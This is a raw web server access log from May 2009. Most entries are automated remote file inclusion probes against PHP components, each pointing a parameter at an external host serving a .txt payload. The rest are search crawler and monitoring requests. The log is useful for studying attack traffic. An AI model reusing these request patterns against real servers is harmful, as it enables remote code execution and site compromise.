110.45.145.92 - - [17/May/2009:00:46:00 -0400] "GET /logs/access_log.Q109031600/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
110.45.145.92 - - [17/May/2009:00:46:01 -0400] "GET /skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
110.45.145.92 - - [17/May/2009:00:46:01 -0400] "GET /logs/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
110.45.145.92 - - [17/May/2009:00:46:01 -0400] "GET /logs/access_log.Q109051000/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
72.3.226.56 - - [17/May/2009:00:46:22 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:46:22 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:46:22 -0400] "GET /logs/access_log.Q109022600//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:46:26 -0400] "GET /logs/access_log.Q109050900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:00:46:29 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.0" 200 76103 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [17/May/2009:00:46:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.214.86.93 - - [17/May/2009:00:47:07 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:00:47:07 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:00:47:07 -0400] "GET /logs/access_log.Q108082000//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.249.72.114 - - [17/May/2009:00:48:45 -0400] "GET /logs/error_log.Q107090700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.103.144 - - [17/May/2009:00:48:51 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:48:51 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:48:51 -0400] "GET /logs/access_log.Q108082400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:48:51 -0400] "GET /logs/access_log.Q108121900/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:50:02 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:50:02 -0400] "GET /logs/access_log.Q108082400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:50:02 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:50:04 -0400] "GET /logs/access_log.Q108121900/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
121.101.159.16 - - [17/May/2009:00:50:07 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
121.101.159.16 - - [17/May/2009:00:50:07 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.803"
121.101.159.16 - - [17/May/2009:00:50:07 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
121.101.159.16 - - [17/May/2009:00:50:38 -0400] "GET /logs/access_log.Q108082800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.803"
121.101.159.16 - - [17/May/2009:00:50:39 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://old.rupor.info/oye.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
121.101.159.16 - - [17/May/2009:00:50:39 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://old.rupor.info/oye.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
121.101.159.16 - - [17/May/2009:00:50:39 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://old.rupor.info/oye.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.803"
121.101.159.16 - - [17/May/2009:00:51:04 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://old.rupor.info/oye.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
121.101.159.16 - - [17/May/2009:00:51:04 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://old.rupor.info/oye.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.803"
121.101.159.16 - - [17/May/2009:00:51:04 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://old.rupor.info/oye.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
89.111.189.11 - - [17/May/2009:00:51:05 -0400] "GET /logs//mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:51:05 -0400] "GET //mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:51:06 -0400] "GET /logs/access_log.Q108111700//mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:51:09 -0400] "GET /logs/access_log.Q109022600%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
121.101.159.16 - - [17/May/2009:00:51:09 -0400] "GET /logs/access_log.Q108082800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://old.rupor.info/oye.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.803"
88.191.103.144 - - [17/May/2009:00:51:12 -0400] "GET /logs/access_log.Q108082400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:51:12 -0400] "GET /logs/access_log.Q108121900%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:51:21 -0400] "GET /logs/access_log.Q109050900%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
121.101.159.16 - - [17/May/2009:00:51:24 -0400] "GET /logs/access_log.Q108082800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://old.rupor.info/oye.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.803"
89.111.189.11 - - [17/May/2009:00:51:28 -0400] "GET //mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:51:30 -0400] "GET /logs//mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:51:30 -0400] "GET /logs/access_log.Q108111700%20%20//mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:00:51:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.111.189.11 - - [17/May/2009:00:52:00 -0400] "GET //mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:52:01 -0400] "GET /logs//mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:52:01 -0400] "GET /logs/access_log.Q109022600//mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:52:07 -0400] "GET /logs/access_log.Q109022600//mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:52:17 -0400] "GET /logs/access_log.Q109022600%20%20//mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:52:30 -0400] "GET /logs/access_log.Q109050900//mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.52.164.18 - - [17/May/2009:00:52:34 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
74.52.164.18 - - [17/May/2009:00:52:34 -0400] "GET /logs//include/admin.lib.inc.php?site_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 229 "-" "libwww-perl/5.811"
74.52.164.18 - - [17/May/2009:00:52:34 -0400] "GET //include/admin.lib.inc.php?site_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
58.227.193.198 - - [17/May/2009:00:52:39 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:52:39 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:52:39 -0400] "GET /logs/access_log.Q108082400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:52:43 -0400] "GET /logs/access_log.Q108121900/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:52:48 -0400] "GET /logs/access_log.Q108082400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:52:49 -0400] "GET /logs/access_log.Q108121900%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
74.52.164.18 - - [17/May/2009:00:53:47 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
66.187.99.209 - - [17/May/2009:00:55:34 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.823"
66.187.99.209 - - [17/May/2009:00:55:34 -0400] "GET /?sourcedir=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.823"
66.187.99.209 - - [17/May/2009:00:55:34 -0400] "GET /logs/?sourcedir=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 200 1686 "-" "libwww-perl/5.823"
66.187.99.209 - - [17/May/2009:00:55:36 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.823"
211.241.40.51 - - [17/May/2009:00:55:49 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:00:55:49 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:00:55:55 -0400] "GET /logs/error_log.Q109051500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.232.102.70 - - [17/May/2009:00:56:12 -0400] "GET /logs/access_log.Q109051000//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:56:12 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:56:12 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
211.241.40.51 - - [17/May/2009:00:56:13 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:00:56:14 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:00:56:27 -0400] "GET /logs/access_log.Q108090100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.111.189.11 - - [17/May/2009:00:56:28 -0400] "GET //mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:56:28 -0400] "GET /logs//mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:56:28 -0400] "GET /logs/access_log.Q109022600//mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.64.202.135 - - [17/May/2009:00:56:40 -0400] "GET /logs/error_log.Q108032900//skin/zero_vote/ask_password.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
209.59.12.99 - - [17/May/2009:00:56:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.225.211.159 - - [17/May/2009:00:56:50 -0400] "GET /logs/access_log.Q109031600/skin/zero_vote/error.php?dir=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:00:56:50 -0400] "GET /skin/zero_vote/error.php?dir=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 222 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:00:56:51 -0400] "GET /logs/skin/zero_vote/error.php?dir=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:00:56:51 -0400] "GET /logs/access_log.Q109051000/skin/zero_vote/error.php?dir=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:00:56:53 -0400] "GET /logs/skin/zero_vote/error.php?dir=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:00:56:54 -0400] "GET /skin/zero_vote/error.php?dir=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 222 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:00:56:54 -0400] "GET /logs/access_log.Q109031600/skin/zero_vote/error.php?dir=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:00:56:54 -0400] "GET /logs/access_log.Q109051000/skin/zero_vote/error.php?dir=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.820"
58.227.193.198 - - [17/May/2009:00:56:59 -0400] "GET /logs/access_log.Q108082400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:00:57:07 -0400] "GET /logs/access_log.Q109011800%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.241.40.51 - - [17/May/2009:00:57:08 -0400] "GET /logs/access_log.Q109011800%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:57:08 -0400] "GET /logs/access_log.Q109050900//mygallerybrowser.php?myPath=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.101.159.16 - - [17/May/2009:00:57:21 -0400] "GET /logs/access_log.Q108091400%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.803"
66.232.102.70 - - [17/May/2009:00:57:32 -0400] "GET /logs/access_log.Q109051000%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.813"
208.64.202.135 - - [17/May/2009:00:57:33 -0400] "GET /logs/error_log.Q108032900//skin/zero_vote/ask_password.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
58.227.193.198 - - [17/May/2009:00:57:48 -0400] "GET /logs/error_log.Q108082400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:00:57:59 -0400] "GET /logs/access_log.Q108112400/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
110.45.145.92 - - [17/May/2009:00:58:00 -0400] "GET /logs/error_log.Q108100300/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
72.30.79.49 - - [17/May/2009:00:57:35 -0400] "GET /logs/access_log.Q109051200 HTTP/1.0" 200 6040641 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.98.59.178 - - [17/May/2009:00:59:13 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:00:59:13 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:00:59:14 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:59:20 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:59:20 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:59:20 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
122.116.178.20 - - [17/May/2009:00:59:27 -0400] "GET /logs/access_log.Q109042600//backend_search.php?contenido_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
122.116.178.20 - - [17/May/2009:00:59:27 -0400] "GET /logs//backend_search.php?contenido_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:59:27 -0400] "GET /logs/access_log.Q108112400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.116.178.20 - - [17/May/2009:00:59:27 -0400] "GET //backend_search.php?contenido_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:59:28 -0400] "GET /logs/access_log.Q108090500/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:59:39 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:59:39 -0400] "GET /logs/error_log.Q109051100//skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:59:39 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:00:59:53 -0400] "GET /logs/access_log.Q108112400/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
110.45.145.92 - - [17/May/2009:00:59:56 -0400] "GET /logs/access_log.Q108112400/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
110.45.145.92 - - [17/May/2009:01:00:04 -0400] "GET /logs/error_log.Q108100300/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.3.226.56 - - [17/May/2009:01:00:07 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:01:00:07 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:01:00:07 -0400] "GET /logs/access_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:01:00:07 -0400] "GET /logs/access_log.Q108080200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
205.196.217.21 - - [17/May/2009:01:00:14 -0400] "GET /logs/access_log.Q108090400%20%20///components/com_remository/remository.class.php?mosConfig_absolute_path=http://purplehill.net/classes/access/1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
